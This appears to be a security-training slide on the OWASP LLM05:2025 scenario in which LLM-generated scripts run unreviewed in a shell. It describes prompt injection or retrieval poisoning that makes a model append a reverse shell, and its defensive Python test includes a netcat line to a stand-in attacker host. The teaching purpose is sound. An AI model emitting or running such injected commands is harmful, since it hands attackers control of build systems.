PART 3
Scenarios
Slides 14–17 · OWASP’s official scenarios, told concretely
Slide 14 · Scenario 1 of 4
A DevOps tool runs the LLM’s script. No questions asked.
OWASP LLM05:2025 Scenario A, retold concretely.
OWASP SCENARIO A
LLM Output Executed Directly in a System Shell
A DevOps platform uses an LLM to generate infrastructure scripts. An engineer asks: "Write a cleanup script for old Docker images on our build server." The LLM generates a bash script, and the platform passes it to subprocess.run(..., shell=True) without review. An attacker who can influence the engineer’s input, or who has poisoned a document the LLM retrieved, causes the model to append a second command: a reverse shell that calls back to the attacker’s host. The script runs, and the attacker now has a shell on the build server.
Why it matters: CI/CD systems run with elevated permissions. A compromised build server can tamper with every artifact the organization ships. This is a supply-chain attack delivered through improper output handling.
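The vulnerable pattern in this scenario can be sketched in a few lines of Python. This is a minimal illustration, not the platform's actual code. The names `llm_script` and `run_unreviewed` are hypothetical, the "attacker" command is a harmless `echo` standing in for a reverse shell, and a POSIX shell (`/bin/sh`) is assumed.

```python
import subprocess

# Hypothetical stand-in for the model's reply: the requested cleanup step,
# followed by a second command the attacker managed to smuggle in.
# Both are harmless echo calls here; a real payload would be a reverse shell.
llm_script = "echo 'pruning old images'; echo 'ATTACKER COMMAND RAN'"


def run_unreviewed(script: str) -> str:
    """Vulnerable pattern: hand the model's text straight to the shell."""
    # shell=True gives the whole string to /bin/sh, which treats ';' as a
    # command separator and runs everything after it as well.
    result = subprocess.run(script, shell=True, capture_output=True, text=True)
    return result.stdout


output = run_unreviewed(llm_script)
print(output)
```

Both commands run, because the shell sees nothing that separates the part the engineer asked for from the part the attacker added.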
What Was Missing

→ LLM output was never reviewed before execution
→ No sandbox or container boundary around the script runner
→ No allowlist of permitted commands
→ shell=True passes the whole script to the system shell, so any chained or injected command runs as well
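Two of the missing controls above, the command allowlist and avoiding shell=True, can be sketched as follows. This is one possible approach under stated assumptions, not a complete defense. `ALLOWED_PROGRAMS`, `SHELL_METACHARS`, `validate_line`, and `run_reviewed` are hypothetical names, the allowlist contents are illustrative, and a POSIX system with an `echo` binary is assumed. Sandboxing and human review remain separate controls that this sketch does not cover.

```python
import shlex
import subprocess

# Hypothetical allowlist: the only programs this runner will start.
ALLOWED_PROGRAMS = {"docker", "echo"}
# Characters that only matter to a shell. Any line containing one is
# rejected outright, even if it is quoted (deliberately conservative).
SHELL_METACHARS = set(";&|`$<>")


def validate_line(line: str) -> list[str]:
    """Return an argv list for an allowed command, or raise ValueError."""
    if any(ch in SHELL_METACHARS for ch in line):
        raise ValueError(f"shell metacharacter in: {line!r}")
    argv = shlex.split(line)  # also raises ValueError on unbalanced quotes
    if not argv or argv[0] not in ALLOWED_PROGRAMS:
        raise ValueError(f"program not on allowlist: {line!r}")
    return argv


def run_reviewed(script: str) -> list[str]:
    """Validate every line first, then run each one without a shell."""
    commands = [validate_line(ln) for ln in script.splitlines() if ln.strip()]
    outputs = []
    for argv in commands:
        # Passing a list with the default shell=False means no shell parses
        # the text, so ';' and '&&' cannot chain a second command.
        done = subprocess.run(
            argv, capture_output=True, text=True, timeout=30, check=True
        )
        outputs.append(done.stdout)
    return outputs


if __name__ == "__main__":
    print(run_reviewed("echo cleanup step"))
    try:
        run_reviewed("echo ok; nc attacker.example 4444")
    except ValueError as err:
        print("rejected:", err)
```

Because the whole script is validated before any line runs, a single rejected line stops everything. An allowlisted program can still do damage through its arguments, so a runner like this would still belong inside a sandbox or container.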
